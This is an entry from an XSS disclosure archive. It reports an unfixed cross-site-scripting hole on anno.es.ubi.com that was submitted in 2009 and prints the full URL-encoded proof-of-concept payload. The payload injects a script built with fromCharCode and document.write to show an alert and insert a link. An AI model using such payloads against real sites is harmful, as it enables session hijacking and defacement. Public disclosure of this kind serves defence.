Security researcher Viper.aT, has submitted on 01/07/2009 a cross-site-scripting (XSS) vulnerability affecting anno.es.ubi.com, which at the time of submission ranked 2445 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/07/2009 |
Date published: 16/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: Viper.aT |
Domain: anno.es.ubi.com |
Category: XSS |
Pagerank: 2445 |
URL: http://anno.es.ubi.com/pc/media1404.php?gallery=media1404&picture=%27%22%3E%3Cscript%3Ealert%28Strin g.fromCharCode%2888,83,83,69,68,32,98,121,32,86,105,112,101,114,46,97,84%29%29;document.write%28Stri ng.fromCharCoe%2860,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,120,115,115,101,100,46,99,1 11,109,47,97,114,99,104,105,118,101,47,97,117,116,104,111,114,61,86,105,112,101,114,46,97,84,47,34,6 2,88,83,83,69,68,60,47,97,62%29%29;%3C/script%3E |
Click here to view the mirror
|
|